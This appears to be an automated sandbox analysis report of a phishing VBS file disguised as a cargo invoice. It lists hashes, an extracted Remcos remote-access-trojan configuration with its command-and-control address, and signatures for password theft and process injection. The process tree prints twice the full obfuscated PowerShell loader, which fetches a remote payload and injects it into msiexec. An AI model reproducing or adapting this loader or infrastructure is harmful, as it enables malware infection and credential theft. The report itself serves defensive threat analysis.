Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 06:14
Static task
static1
Behavioral task
behavioral1
Sample
Cargo Invoice_pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Cargo Invoice_pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
Cargo Invoice_pdf.vbs
-
Size
46KB
-
MD5
7ccd1a741f2ea97cc446879d217f636f
-
SHA1
c087c6a2a087692186f8ef00c2eb6b2dcb5d9f9a
-
SHA256
638a81e98cf77b877d52a2a483afb34482c84aa3bbc7cac790fdcb93d7ff1e1d
-
SHA512
35aeb6799decf351daf4a3afa31201c43c3ba28e75daca87bed54dd8d0659d68b427647d0caf5e2ef2ab0290ae577f987b256e67b20a697f06f26e57076aa8bb
-
SSDEEP
768:cyWWCy/nv4uIWF+TZJPQfkQ9B3czELCZJbXDePgUM7p1ZQ6eLfGuz3n6WKW5Kc3:cyhCy/vKW2XakQ4z4IXcO1ZQB37v5
Malware Config
Extracted
remcos
RemoteHost
154.216.18.214:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-AOD6MB
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/2116-68-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1788-69-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4128-67-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/1788-69-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2116-68-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 7 IoCs
Processes:
WScript.exepowershell.exemsiexec.exeflow pid Process 3 516 WScript.exe 14 4152 powershell.exe 22 4420 msiexec.exe 24 4420 msiexec.exe 26 4420 msiexec.exe 27 4420 msiexec.exe 30 4420 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
msiexec.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WScript.exedescription ioc Process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 4420 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 824 powershell.exe 4420 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
msiexec.exedescription pid Process procid_target PID 4420 set thread context of 2116 4420 msiexec.exe 98 PID 4420 set thread context of 1788 4420 msiexec.exe 99 PID 4420 set thread context of 4128 4420 msiexec.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
msiexec.exemsiexec.exemsiexec.exemsiexec.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid Process 4152 powershell.exe 4152 powershell.exe 824 powershell.exe 824 powershell.exe 824 powershell.exe 4128 msiexec.exe 4128 msiexec.exe 2116 msiexec.exe 2116 msiexec.exe 2116 msiexec.exe 2116 msiexec.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exemsiexec.exepid Process 824 powershell.exe 4420 msiexec.exe 4420 msiexec.exe 4420 msiexec.exe 4420 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid Process Token: SeDebugPrivilege 4152 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 4128 msiexec.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exepowershell.exemsiexec.exedescription pid Process procid_target PID 516 wrote to memory of 4152 516 WScript.exe 85 PID 516 wrote to memory of 4152 516 WScript.exe 85 PID 824 wrote to memory of 4420 824 powershell.exe 95 PID 824 wrote to memory of 4420 824 powershell.exe 95 PID 824 wrote to memory of 4420 824 powershell.exe 95 PID 824 wrote to memory of 4420 824 powershell.exe 95 PID 4420 wrote to memory of 1712 4420 msiexec.exe 97 PID 4420 wrote to memory of 1712 4420 msiexec.exe 97 PID 4420 wrote to memory of 1712 4420 msiexec.exe 97 PID 4420 wrote to memory of 2116 4420 msiexec.exe 98 PID 4420 wrote to memory of 2116 4420 msiexec.exe 98 PID 4420 wrote to memory of 2116 4420 msiexec.exe 98 PID 4420 wrote to memory of 2116 4420 msiexec.exe 98 PID 4420 wrote to memory of 1788 4420 msiexec.exe 99 PID 4420 wrote to memory of 1788 4420 msiexec.exe 99 PID 4420 wrote to memory of 1788 4420 msiexec.exe 99 PID 4420 wrote to memory of 1788 4420 msiexec.exe 99 PID 4420 wrote to memory of 4128 4420 msiexec.exe 100 PID 4420 wrote to memory of 4128 4420 msiexec.exe 100 PID 4420 wrote to memory of 4128 4420 msiexec.exe 100 PID 4420 wrote to memory of 4128 4420 msiexec.exe 100
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Cargo Invoice_pdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Roomstead='Taktfuldste';;$vitiligo='Chron';;$skumgummier='Radiable';;$Defrosters='slab';;$Projektopgavens='surfrideres';;$Trinka=$host.Name;function Autodrome($Loadedness){If ($Trinka) {$Rullers=3} for ($Elaidin=$Rullers;;$Elaidin+=4){if(!$Loadedness[$Elaidin]) { break }$Bioenergiens+=$Loadedness[$Elaidin]}$Bioenergiens}function ejner($Girlishness){ .($Genkomstens) ($Girlishness)}$Waney=Autodrome 'ChoNPh eUnwTChu.M dwIndeBilBMi,CNe LParIT pE ,oNO dt';$Veheftets=Autodrome 'RelMsyno ,ezUdri RnlUn.lautaOpf/';$Halskde=Autodrome 'UndTOrdlDiss Ma1 Mi2';$Radiovirksomhed='re [st,n Ase Nyt st.HussChleVeerModv OmI Noc R,E RipPudosoyITanNRtetsamMUndA ln isaC rg ae.meRRe ]Dr,:Whi:Iros ,jeT pCQa UsplrNoniVedTambY enP T R ,ioPeaTAp.OPencDupOMadlTam=Lov$ ndhbioATunL ansnavksted H E';$Veheftets+=Autodrome 'sub5Ok . Wi0Ext Res( T WMiciRasnsupd raoFilwIansRen strNundT Ud ok1Bla0Af .sve0Ind; Gr .nmWRecis,gn Va6Pro4 Ra; Ch D oxG i6Ind4sil; rd IdorMygv ef:nit1Du 3 C 1End. so0Ele)s,r He GU,resprc,ybk pioFre/Nor2sil0Pai1 Di0Des0Ove1Tit0Udl1 Te BloFE dibetrMare.idfFrao tx ar/Bob1It.3 nf1dia.Mic0';$Hexprint=Autodrome 'HovUPu.sFraeLinrsp -InfA.atGTruePronHypT';$Moduludlejningerne=Autodrome 'rulhsamtTritIdepslksCal:Rip/Hej/NakbDio9 ApaCri1Co,.Feri sccMe uPre/ Meh UnU .rP,rcMVana kisRb,YUndGspa/CorNs ro DenT,ieEl,x.uspBroaLven lhs tei C,o BanPoe.sepjP aaF evU.ba';$Absentia=Autodrome ' fi>';$Genkomstens=Autodrome 'Mi i neeOutX';$Taareflaads='Udfaldsvejens';$Blomsterbutikken='\informationsressourcernes.Udb';ejner (Autodrome 'Ind$sengMagLHonoAikB Hsac il Mi: Enssk UR eb iaLMe oFren KdG ke= st$ ReEGranEn v fo:CoaA ysPBubPRecDstaApr,tKleaTil+Zeb$selbUndLImmoBi,MRe,sCorT byEVi rUdsbClauskitpliIMeaKTalkProERa n');ejner (Autodrome ' al$Nong BelTrio evBGorA KolEr,:sliAOpmmpalbEn,oY lL BeT.or= Du$su mEskoB.idstrUsinlE ru ind arLUdteGenj,onNMidIs rnBevG G epanrHovNCoaEc o.BrasWiep FaL ruiMictVid(str$D.sATrub es.opesvonCart prI igAInv)');ejner (Autodrome $Radiovirksomhed);$Moduludlejningerne=$Ambolt[0];$Buntmageren=(Autodrome ' .l$A cGAmpLF,roF sBBe.AConl.om:IsemOveOB grNetN ExEBi,tM,lTAlmE cu= nN iePseWKir-HedO UnbB djDunEsigcLevt In Revs bly.ris.yetBnneangM B..Cau$TilwKluaMaaNLapEMily');ejner ($Buntmageren);ejner (Autodrome 'Ove$ D.M,heosisr.kan Vieaftt sktIn eVic.ForH D eskjaArbdskoePenrTins,uf[Afs$KonHGlaeFavxEssp anr koishinB gtTak]As,=Bla$ s,V ore sihsubetekfRe.tIrme zet.ers');$Mascouten=Autodrome ',tt$AleMtaloPi r annPree PatP itsplesno.VaiDskaoD.fwa snU.dlUdeoPalasawd BiFsviiTo.lAmeeGau(Ott$GarMHepoBaldhexuDe l UduMandD alFejeAfgjsidnBrni .knArkgGule K r BenAe estr,mon$ZooU K nUnfdKobe s rTegs.nttBaatsabtForeNond DueInssDyr)';$Understttedes=$sublong;ejner (Autodrome 'uds$LodGRe L,dso fubfjeAsowlFid:sa fInfUL usProIIndoE.vNFlaATall Br=skr(i ptBcee hosEfttOve- InPKolA.utt Cah Mi Cha$CrouKvinsymDsupeNegRC,ms,lcT ExTT,stBe.EAmbD are UdsU i)');while (!$Fusional) {ejner (Autodrome 'Leu$speg EvlAlvo nb reaMeelNot: nts G.h LniTryr Het D mim aDdrkPuseNorrHej= A,$BibE MalWagaHeaiUkrdAnoiHapnExhnDatd BjshymtscrtRenes,plWhasInfesodn') ;ejner $Mascouten;ejner (Autodrome 's bsBort,esAHamRsubt Pr-ProsoutLbesERume Nop.as Ret4');ejner (Autodrome 'End$ BiG K Lst.oDreBTunaMa Ls u: Ref bjUstisD eIMinODownAktaArbLClo=F.n(A tTReaETh.ssktTFcs-,oiP BiaImmtEskHT.m r$PlauummNkakdReiesl.Rbrus.prTPriTRadt raEsniDUveEGons in)') ;ejner (Autodrome ' R $ iGUnsLMako BlbEpiAmeml Bo:EndhLikA BlN od BrsChuTWa AForN,vnd atsWa =Ato$skygIn.lUd oBelBFasauhaLFoi:AfvLspiE og O g YeIResN PoGB lsCom+Pro+ p% av$UdgAuniMThiBUdso B.L,enT Fo.Rosc soO dtu B.NBisT') ;$Moduludlejningerne=$Ambolt[$Handstands]}$Turnable=323798;$Microanatomy=29573;ejner (Autodrome 'A g$s igAstLD.rOCutBmesAorgL Fo:.hoM ifODemnb.iTstea skdT ra omLD se Ga U l=Tro Ecgg sELectFor-PriC HaOMelNUmaT MeEAadn s,TVie sch$dreU.onn red,eceOmvRL.msHelts utpr T te.hydGenEDeis');ejner (Autodrome 'Bog$KomgPral,osoG nbAu aTralH o: I,TspiyProl kvo Unt ase In N =E.d a a[ UfsChayscrssl tHaleDanmCel.BacCneuosimn P v LaeHigrskutNeo]Pil:Tol: yFCanrmoro HamWheBFara Mos nePel6,an4L psOvetw.pr dmiFasnYe.gI,s(Ano$KreM seo unPr.t paaIncd Ena edlsteesva)');ejner (Autodrome 'ude$krigtr lPlaOClob.oda ,iLIso:FormIndap eREtatJa.y.isRem O Y lK sO dlgpariM tsH.sTPani O.C Cu Qua=Vag .nc[cousspryk rssidttelelo MMot. GaTAtoEn ex krTBe,.KviEKgsNFo,cNonoTonDu.hIOphNTorGM z] or:Pus: h,akoksFraCGosise,IBri.AntGU,bEEs.tfr,sPost sprDedi B,NWanG al(hje$t.etYrby,niL InOsoaTIndE Da)');ejner (Autodrome 'Cun$O eG Unl BrOBrob InA suLud,:,ndCHl,hTeniP aL Glo P gKannChiAOmktepiHFni=Kla$ Bam ,raAnarFu.T nhyBesRR.pORe LEksO GagForIHylsdecT heIPsecall.s assp,u I bCatsregTGe RsabI reN erGgr (Gri$AlntConUPa RDecNPerA,apBGaslBenePe.,str$Pycm Plis.ocAntr HyOUnbANamnDr aPeltUnpo PrmHegyF l)');ejner $Chilognath;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Roomstead='Taktfuldste';;$vitiligo='Chron';;$skumgummier='Radiable';;$Defrosters='slab';;$Projektopgavens='surfrideres';;$Trinka=$host.Name;function Autodrome($Loadedness){If ($Trinka) {$Rullers=3} for ($Elaidin=$Rullers;;$Elaidin+=4){if(!$Loadedness[$Elaidin]) { break }$Bioenergiens+=$Loadedness[$Elaidin]}$Bioenergiens}function ejner($Girlishness){ .($Genkomstens) ($Girlishness)}$Waney=Autodrome 'ChoNPh eUnwTChu.M dwIndeBilBMi,CNe LParIT pE ,oNO dt';$Veheftets=Autodrome 'RelMsyno ,ezUdri RnlUn.lautaOpf/';$Halskde=Autodrome 'UndTOrdlDiss Ma1 Mi2';$Radiovirksomhed='re [st,n Ase Nyt st.HussChleVeerModv OmI Noc R,E RipPudosoyITanNRtetsamMUndA ln isaC rg ae.meRRe ]Dr,:Whi:Iros ,jeT pCQa UsplrNoniVedTambY enP T R ,ioPeaTAp.OPencDupOMadlTam=Lov$ ndhbioATunL ansnavksted H E';$Veheftets+=Autodrome 'sub5Ok . Wi0Ext Res( T WMiciRasnsupd raoFilwIansRen strNundT Ud ok1Bla0Af .sve0Ind; Gr .nmWRecis,gn Va6Pro4 Ra; Ch D oxG i6Ind4sil; rd IdorMygv ef:nit1Du 3 C 1End. so0Ele)s,r He GU,resprc,ybk pioFre/Nor2sil0Pai1 Di0Des0Ove1Tit0Udl1 Te BloFE dibetrMare.idfFrao tx ar/Bob1It.3 nf1dia.Mic0';$Hexprint=Autodrome 'HovUPu.sFraeLinrsp -InfA.atGTruePronHypT';$Moduludlejningerne=Autodrome 'rulhsamtTritIdepslksCal:Rip/Hej/NakbDio9 ApaCri1Co,.Feri sccMe uPre/ Meh UnU .rP,rcMVana kisRb,YUndGspa/CorNs ro DenT,ieEl,x.uspBroaLven lhs tei C,o BanPoe.sepjP aaF evU.ba';$Absentia=Autodrome ' fi>';$Genkomstens=Autodrome 'Mi i neeOutX';$Taareflaads='Udfaldsvejens';$Blomsterbutikken='\informationsressourcernes.Udb';ejner (Autodrome 'Ind$sengMagLHonoAikB Hsac il Mi: Enssk UR eb iaLMe oFren KdG ke= st$ ReEGranEn v fo:CoaA ysPBubPRecDstaApr,tKleaTil+Zeb$selbUndLImmoBi,MRe,sCorT byEVi rUdsbClauskitpliIMeaKTalkProERa n');ejner (Autodrome ' al$Nong BelTrio evBGorA KolEr,:sliAOpmmpalbEn,oY lL BeT.or= Du$su mEskoB.idstrUsinlE ru ind arLUdteGenj,onNMidIs rnBevG G epanrHovNCoaEc o.BrasWiep FaL ruiMictVid(str$D.sATrub es.opesvonCart prI igAInv)');ejner (Autodrome $Radiovirksomhed);$Moduludlejningerne=$Ambolt[0];$Buntmageren=(Autodrome ' .l$A cGAmpLF,roF sBBe.AConl.om:IsemOveOB grNetN ExEBi,tM,lTAlmE cu= nN iePseWKir-HedO UnbB djDunEsigcLevt In Revs bly.ris.yetBnneangM B..Cau$TilwKluaMaaNLapEMily');ejner ($Buntmageren);ejner (Autodrome 'Ove$ D.M,heosisr.kan Vieaftt sktIn eVic.ForH D eskjaArbdskoePenrTins,uf[Afs$KonHGlaeFavxEssp anr koishinB gtTak]As,=Bla$ s,V ore sihsubetekfRe.tIrme zet.ers');$Mascouten=Autodrome ',tt$AleMtaloPi r annPree PatP itsplesno.VaiDskaoD.fwa snU.dlUdeoPalasawd BiFsviiTo.lAmeeGau(Ott$GarMHepoBaldhexuDe l UduMandD alFejeAfgjsidnBrni .knArkgGule K r BenAe estr,mon$ZooU K nUnfdKobe s rTegs.nttBaatsabtForeNond DueInssDyr)';$Understttedes=$sublong;ejner (Autodrome 'uds$LodGRe L,dso fubfjeAsowlFid:sa fInfUL usProIIndoE.vNFlaATall Br=skr(i ptBcee hosEfttOve- InPKolA.utt Cah Mi Cha$CrouKvinsymDsupeNegRC,ms,lcT ExTT,stBe.EAmbD are UdsU i)');while (!$Fusional) {ejner (Autodrome 'Leu$speg EvlAlvo nb reaMeelNot: nts G.h LniTryr Het D mim aDdrkPuseNorrHej= A,$BibE MalWagaHeaiUkrdAnoiHapnExhnDatd BjshymtscrtRenes,plWhasInfesodn') ;ejner $Mascouten;ejner (Autodrome 's bsBort,esAHamRsubt Pr-ProsoutLbesERume Nop.as Ret4');ejner (Autodrome 'End$ BiG K Lst.oDreBTunaMa Ls u: Ref bjUstisD eIMinODownAktaArbLClo=F.n(A tTReaETh.ssktTFcs-,oiP BiaImmtEskHT.m r$PlauummNkakdReiesl.Rbrus.prTPriTRadt raEsniDUveEGons in)') ;ejner (Autodrome ' R $ iGUnsLMako BlbEpiAmeml Bo:EndhLikA BlN od BrsChuTWa AForN,vnd atsWa =Ato$skygIn.lUd oBelBFasauhaLFoi:AfvLspiE og O g YeIResN PoGB lsCom+Pro+ p% av$UdgAuniMThiBUdso B.L,enT Fo.Rosc soO dtu B.NBisT') ;$Moduludlejningerne=$Ambolt[$Handstands]}$Turnable=323798;$Microanatomy=29573;ejner (Autodrome 'A g$s igAstLD.rOCutBmesAorgL Fo:.hoM ifODemnb.iTstea skdT ra omLD se Ga U l=Tro Ecgg sELectFor-PriC HaOMelNUmaT MeEAadn s,TVie sch$dreU.onn red,eceOmvRL.msHelts utpr T te.hydGenEDeis');ejner (Autodrome 'Bog$KomgPral,osoG nbAu aTralH o: I,TspiyProl kvo Unt ase In N =E.d a a[ UfsChayscrssl tHaleDanmCel.BacCneuosimn P v LaeHigrskutNeo]Pil:Tol: yFCanrmoro HamWheBFara Mos nePel6,an4L psOvetw.pr dmiFasnYe.gI,s(Ano$KreM seo unPr.t paaIncd Ena edlsteesva)');ejner (Autodrome 'ude$krigtr lPlaOClob.oda ,iLIso:FormIndap eREtatJa.y.isRem O Y lK sO dlgpariM tsH.sTPani O.C Cu Qua=Vag .nc[cousspryk rssidttelelo MMot. GaTAtoEn ex krTBe,.KviEKgsNFo,cNonoTonDu.hIOphNTorGM z] or:Pus: h,akoksFraCGosise,IBri.AntGU,bEEs.tfr,sPost sprDedi B,NWanG al(hje$t.etYrby,niL InOsoaTIndE Da)');ejner (Autodrome 'Cun$O eG Unl BrOBrob InA suLud,:,ndCHl,hTeniP aL Glo P gKannChiAOmktepiHFni=Kla$ Bam ,raAnarFu.T nhyBesRR.pORe LEksO GagForIHylsdecT heIPsecall.s assp,u I bCatsregTGe RsabI reN erGgr (Gri$AlntConUPa RDecNPerA,apBGaslBenePe.,str$Pycm Plis.ocAntr HyOUnbANamnDr aPeltUnpo PrmHegyF l)');ejner $Chilognath;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wtcxsidqiujuualeeuexnvapqunswh"3⤵PID:1712
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wtcxsidqiujuualeeuexnvapqunswh"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2116
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\znhpkbnrwcbzxozqnfqzxiuyzaebqskuw"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1788
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jpnal"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5f1d2c01ce674ad7d5bad04197c371fbc
SHA14bf0ed04d156a3dc6c8d27e134ecbda76d3585aa
SHA25625b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094
SHA51281cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77
-
Filesize
460KB
MD5cc054403561c5e31587491e3ce750c24
SHA1cbe5e6abba81af604b23553aff9b90bd46d20399
SHA2569b8897a9589f956a7955c1edc4f5d3eb20b6fec10b6b43af3864b390508356d0
SHA5123f2bc50860680ad31a6e12aaaeb3aa822ef2b7f2673bd9dc5c74a64f973bd5c14ededa0ac0277efd1141a225e1eadb040c8522c916bdcc11fbdb5067c8a95577